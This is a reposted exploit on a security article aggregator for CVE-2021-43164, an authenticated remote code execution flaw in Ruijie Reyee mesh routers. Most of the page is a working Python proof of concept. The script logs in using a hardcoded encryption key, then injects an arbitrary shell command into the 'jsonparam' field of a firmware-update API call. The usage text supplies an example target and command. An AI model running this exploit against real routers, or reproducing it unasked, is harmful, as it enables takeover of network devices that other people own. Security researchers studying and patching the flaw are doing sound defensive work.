HackDig : Dig high-quality web security articles

Ruijie Reyee Mesh Router Remote Code Execution

2022-05-11 17:30
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)# Google Dork: None# Date: November 1, 2021# Exploit Author: Minh Khoa of VSEC# Vendor Homepage: https://ruijienetworks.com# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO# CVE: CVE-2021-43164#!/usr/bin/python3import osimport sysimport timeimport requestsimport jsondef enc(PASS):    key   = "RjYkhwzx$2018!"    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)    return os.popen(shell).read().strip()try:    TARGET  = sys.argv[1]    USER    = sys.argv[2]    PASS    = sys.argv[3]    COMMAND = sys.argv[4]except Exception:    print("CVE-2021-43164 PoC")    print("Usage:   python3 exploit.py <target> <user> <pass> <command>")    print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")    sys.exit(1)endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)payload = {        "method": "login",        "params": {            "username": USER,            "password": enc(PASS),            "encry": True,            "time": int(time.time()),            "limit": False            }        }r = requests.post(endpoint, json=payload)sid = json.loads(r.text)["data"]["sid"]endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)payload = {        "method": "updateVersion",        "params": {            "jsonparam": "'; {} #".format(COMMAND)            }        }r = requests.post(endpoint, json=payload)print(r.text)            


Source: 5400502202-BLW/eussi/moc.ytirucesxc

Read:1238 | Comments:0 | Tags:No Tag

“Ruijie Reyee Mesh Router Remote Code Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)
Tell me why you support me <3

Tag Cloud